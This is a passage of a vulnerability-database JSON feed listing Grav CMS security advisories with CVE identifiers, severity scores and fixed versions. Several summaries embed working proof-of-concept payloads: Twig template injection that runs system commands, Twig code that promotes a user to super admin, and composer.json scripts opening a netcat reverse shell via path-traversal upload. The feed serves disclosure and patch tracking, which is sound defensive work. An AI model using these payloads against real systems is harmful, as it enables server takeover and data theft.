:"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h756-wh59-hhjv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66295","GHSA-h756-wh59-hhjv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-31dk-jdqj-pfag"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11742?format=json","vulnerability_id":"VCID-47rc-kqnw-7ue8","summary":"Server Side Template Injection (SSTI)\n### Summary\nGrav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands.\n\n### Details\n```\n{{ grav.twig.twig.getFunction('twig_array_map')|var_dump }}\n```\n\n\nWhen we accessed twig_array_map like this, we confirmed that the twigFunction object is properly returned. Since the callable property is correctly included, we can access twig_array_map without any restrictions.\n\n```\n{% set cmd = {'id':'system'} %}\n{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}\n```\nSince there is no validation on twig_array_map itself, it is possible to call arbitrary function using call_user_func.\n\n### PoC\n```\n{% set cmd = {'id':'system'} %}\n{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}\n```\n\n### Impact\nTwig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.\nAs the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28117","reference_id":"","reference_type":"","scores":[{"value":"0.00482","scoring_system":"epss","scoring_elements":"0.65454","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28117"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T19:11:01Z/"}],"url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T19:11:01Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28117","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28117"},{"reference_url":"https://github.com/advisories/GHSA-qfv4-q44r-g7rv","reference_id":"GHSA-qfv4-q44r-g7rv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qfv4-q44r-g7rv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-28117","GHSA-qfv4-q44r-g7rv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-47rc-kqnw-7ue8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30095?format=json","vulnerability_id":"VCID-6gtj-f6gc-d3bf","summary":"Grav vulnerable to Privilege Escalation and Authenticated Remote Code Execution via Twig Injection\n### Summary\nA user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities.\n\n### Details\nGrav CMS allows Twig to be executed in page templates if enabled in admin panel (process: twig: true).\nA user with publisher/editor privileges, that can create or edit pages and enable twig processing, can thereby inject arbitrary code that will execute in the context of the page render.\n\nThis enables exploitation of Grav internal APIs such as:\n- `grav.user.update()` and `grav.user.save()` for escalating the current user to super admin or admin\n- `grav.scheduler.addCommand()`, `grav.scheduler.save()` and `grav.scheduler.run()` for code execution\n\nThe Twig sandbox is not enforced in this context, allowing full access to any backend PHP object and method in the `system/src/Grav/Common` directory.\n\n### PoC\n#### Preconditions:\n- You must have access to a **non-admin** user with permission to create/edit pages (```admin.pages``` access)\n- For Privilege Escalation, you also have to be logged in to the site with the same user as the admin panel.\n\n#### Steps to reproduce Privilege Escalation:\n1. Login into the non-admin page (default at `cms-url/login`).\n2. Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -> Process: Twig: true).\n3. Inject the following payload into the page content to escalate privileges:\n```\n{% set _ = grav.user.update({\n 'access': {\n 'admin': {\n 'login': true,\n 'super': true\n }\n }\n}, {}) %}\n{% set _ = grav.user.save() %}\n```\n4. Visit the edited/created page url. The logged in user is now admin. (*Note: For the changes to show, you need to log out of the admin panel and relogin).*\n\n#### Steps to reproduce Remote Code Execution:\n1. Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -> Process: Twig: true).\n2. Inject the following payload into the page content to execute commands:\n```\n{% set _ = grav.scheduler.addCommand('curl', ['http://localhost:8000']) %}\n{% set _ = grav.scheduler.save() %}\n{% set _ = grav.scheduler.run() %}\n```\n3. Visit the page to trigger the execution. The system will issue a `curl` request.\n\n### Impact\nThis vulnerability allows:\n- Privilege Escalation from any user with page editing capabilities to full admin (super) access.\n- Remote Code Execution, as the attacker can run system arbitrary commands via the scheduler API.\n\nIt affects any Grav CMS installation where users with lower privileges are allowed to create or edit pages and Twig processing is not globally disabled.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66297","reference_id":"","reference_type":"","scores":[{"value":"0.00475","scoring_system":"epss","scoring_elements":"0.65099","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66297"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:26:40Z/"}],"url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:26:40Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66297","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66297"},{"reference_url":"https://github.com/advisories/GHSA-858q-77wx-hhx6","reference_id":"GHSA-858q-77wx-hhx6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-858q-77wx-hhx6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66297","GHSA-858q-77wx-hhx6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6gtj-f6gc-d3bf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30263?format=json","vulnerability_id":"VCID-91ht-8cax-7kdr","summary":"Grav is vulnerable to a DOS on the admin panel\n# DOS on the admin panel\n**Severity Rating:** Medium \n\n**Vector:** Denial Of Service\n\n**CVE:** XXX\n\n**CWE:** 400 - Uncontrolled Resource Consumption\n\n**CVSS Score:** 4.9\n\n**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H\n\n## Analysis\n\nA Denial of Service (DoS) vulnerability has been identified in the application related to the handling of `scheduled_at` parameters. Specifically, the application fails to properly sanitize input for cron expressions. By manipulating the `scheduled_at` parameter with a malicious input, such as a single quote, the application admin panel becomes non-functional, causing significant disruptions to administrative operations.\n\nThe only way to recover from this issue is to manually access the host server and modify the `backup.yaml` file to correct the corrupted cron expression\n\n## Proof of Concept\n\n1) Change the value of `scheduled_at` parameter to `'` as shown in the following figures at the `http://127.0.0.1/admin/tools` endpoint, and observe the response in the second figure:\n \n *Figure: Http request on tool endpoint*\n\n *Figure: Http response on tool endpoint*\n\n2) When trying to access the admin panel, the panel is broken as shown in the following figure. Additionally, the value change is reflected in the `backup.yaml` file, as shown in the second figure:\n \n *Figure: Error message view*\n\n *Figure: Backup.yaml file*\n\n\n## Workarounds\nNo workaround is currently known\n\n# Timeline\n**2024-07-24** Issue identified\n\n**2024-09-27** Vendor contacted\n\n\n# About X41 D-Sec GmbH\nX41 is an expert provider for application security services.\nHaving extensive industry experience and expertise in the area of information\nsecurity, a strong core security team of world class security experts enables\nX41 to perform premium security services.\n\nFields of expertise in the area of application security are security centered\ncode reviews, binary reverse engineering and vulnerability discovery.\nCustom research and IT security consulting and support services are core\ncompetencies of X41.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66303","reference_id":"","reference_type":"","scores":[{"value":"0.00138","scoring_system":"epss","scoring_elements":"0.33536","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66303"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:10:29Z/"}],"url":"https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:10:29Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66303","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66303"},{"reference_url":"https://github.com/advisories/GHSA-x62q-p736-3997","reference_id":"GHSA-x62q-p736-3997","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x62q-p736-3997"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66303","GHSA-x62q-p736-3997"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-91ht-8cax-7kdr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11511?format=json","vulnerability_id":"VCID-9h5a-h26f-cudw","summary":"Grav File Upload Path Traversal\n### Summary\nGrav is vulnerable to a file upload path traversal vulnerability, that can allow an adversary to replace or create files with extensions such as .json, .zip, .css, .gif, etc. This vulnerabiltiy can allow attackers to inject arbitrary code on the server, undermine integrity of backup files by overwriting existing backups or creating new ones, and exfiltrating sensitive data using CSS Injection exfiltration techniques.\n\n### Installation Configuration\n- Grav CMS 1.10.44\n- Apache web server\n- php-8.2\n\n### Details\n_**Vulnerable code location:**_ grav/system/src/Grav/Common/Media/Traits/MediaUploadTrait.php/checkFileMetadata() method_\n\n public function checkFileMetadata(array $metadata, string $filename = null, array $settings = null): string\n {\n // Add the defaults to the settings.\n $settings = $this->getUploadSettings($settings);\n\n // Destination is always needed (but it can be set in defaults).\n $self = $settings['self'] ?? false;\n if (!isset($settings['destination']) && $self === false) {\n throw new RuntimeException($this->translate('PLUGIN_ADMIN.DESTINATION_NOT_SPECIFIED'), 400);\n }\n\n if (null === $filename) {\n // If no filename is given, use the filename from the uploaded file (path is not allowed). \n $folder = '';\n $filename = $metadata['filename'] ?? '';\n } else {\n // If caller sets the filename, we will accept any custom path.\n $folder = dirname($filename); `-> Vulnerable Code`\n if ($folder === '.') {\n $folder = '';\n }\n $filename = Utils::basename($filename);\n\n### PoC\n\n1. Log in to the Grav CMS using a super administrator account.\n2. Add a user in the \"Accounts\" section with the following permissions:\n- Login to Admin\n- Page Update\n3. Log out of the super administrator account and log in with the previously created user account.\n4. Navigate to the https://<grav>admin/pages/home.\n5. Use the following command in Kali Linux to open a netcat listener:\n```\nnc -lvnp 8081\n```\n\nNote: \"nc\" or netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. We are using this tool to get a reverse shell from the server hosting Grav CMS.\n7. Using a web interception proxy, click on the \"Page Media\" section and upload a json file with the following added to the \"scripts\" section (https://getcomposer.org/doc/articles/scripts.md):\n```\n\"post-install-cmd\": \"nc <IP-address> 8081 -e /bin/bash\",\n\"post-update-cmd\": \"nc <IP-address> 8081 -e /bin/bash\"\n```\n**_Note:_** The post installation and update script used in this PoC is only for demonstration purposes. There are various other scripts that may be injected such as `command` that executes the corresponding script before any Composer Command is executed on the CLI.\n\n_Note: . Please replace <IP-address> with the IP address of the Kali Linux netcat listener._\n8. Modify the \"name\" parameter to \"../../../c/omposer.json\" and forward the request.\n9. Observe the successful upload message from the server response:\n\n10. In the Grav web root, observe that the \"composer.json\" file was successfully replaced by the malicious \"composer.json\" file containing a reverse shell script.\n11. Run any variations of the following commands in the Grav web server and observe the successful reverse shell:\n- bin/grav composer\n- composer update\n- composer install\n\n\n### Impact\n\n1. **Arbitrary Code Injection:** Attackers can replace the composer.json file with a malicious one containing arbitratry composer scripts. This can result in code execution when the `composer` command is used for any purpose in the server. that can allow attackers to get a reverse shell on the server.\n\n2. **Backup Compromise:** .zip backup files can be replaced, undermining data integrity and recovery mechanisms:\n\n\n\n3. **Sensitive Information Exposure:** Modification of .css files provides an avenue for attackers to exfiltrate sensitive information, such as usernames and passwords, compromising confidentiality.\n","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27921","reference_id":"","reference_type":"","scores":[{"value":"0.08787","scoring_system":"epss","scoring_elements":"0.92643","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27921"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T16:27:48Z/"}],"url":"https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T16:27:48Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27921","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27921"},{"reference_url":"https://github.com/advisories/GHSA-m7hx-hw6h-mqmc","reference_id":"GHSA-m7hx-hw6h-mqmc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m7hx-hw6h-mqmc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-27921","GHSA-m7hx-hw6h-mqmc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9h5a-h26f-cudw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30220?format=json","vulnerability_id":"VCID-9h65-8eka-quhd","summary":"Grav Exposes Password Hashes Leading to privilege escalation\n# Exposure of Password Hashes Leading to privilege escalation\n**Severity Rating:** Medium \n\n**Vector:** Privilege Escalation\n\n**CVE:** XXX\n\n**CWE:** 200 - Exposure of Sensitive Information\n\n**CVSS Score:** 6.2\n\n**CVSS Vector:** CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L\n\n## Analysis\n\nIt was observed that if a users is given read access on the user account management section of the admin panel can view the password hashes of all users, including the admin user. This exposure can potentially lead to privilege escalation if an attacker can crack these password hashes.\n\nAn attacker with read access can: \n* View and potentially crack the password hashes.\n* Gain administrative access by cracking the admin password hash.\n* Escalate privileges and compromise the entire admin panel.\n\n\n## Proof of Concept\n\n1) Give read access to user accounts to a random user as shown in the following figures:\n \n \n \n\n2) Log in to the admin panel with an account that has read access to user accounts and navigate to the user account management section.\n\n3) Go to the admin profile `http://127.0.0.1/admin/accounts/users/admin`; The password is not display. Try inspecting the page source code as shown in the following figures:\n \n \n You can see that it match the hash that is in the admin.yaml file :\n \n \n\n4) Crack the hash as shown in the following figure, the algorithm use here is bcrypt:\n \n\n \n\n## Workarounds\nNo workaround is currently known\n\n# Timeline\n**2024-07-24** Issue identified\n\n**2024-09-27** Vendor contacted\n\n\n# About X41 D-Sec GmbH\nX41 is an expert provider for application security services.\nHaving extensive industry experience and expertise in the area of information\nsecurity, a strong core security team of world class security experts enables\nX41 to perform premium security services.\n\nFields of expertise in the area of application security are security centered\ncode reviews, binary reverse engineering and vulnerability discovery.\nCustom research and IT security consulting and support services are core\ncompetencies of X41.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66304","reference_id":"","reference_type":"","scores":[{"value":"0.00071","scoring_system":"epss","scoring_elements":"0.21723","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66304"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T20:15:09Z/"}],"url":"https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T20:15:09Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66304","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66304"},{"reference_url":"https://github.com/advisories/GHSA-gq3g-666w-7h85","reference_id":"GHSA-gq3g-666w-7h85","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gq3g-666w-7h85"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66304","GHSA-gq3g-666w-7h85"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9h65-8eka-quhd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30035?format=json","vulnerability_id":"VCID-bdnj-twfh-subp","summary":"Grav vulnerable to Denial of Service via Improper Input Handling in 'Supported' Parameter\n**Endpoint**: `admin/config/system` \n**Submenu**: `Languages` \n**Parameter**: `Supported` \n**Application**: Grav v 1.7.48\n\n---\n\n## Summary\n\nA Denial of Service (DoS) vulnerability was identified in the **\"Languages\"** submenu of the Grav **admin configuration panel** (`/admin/config/system`). Specifically, the `Supported` parameter 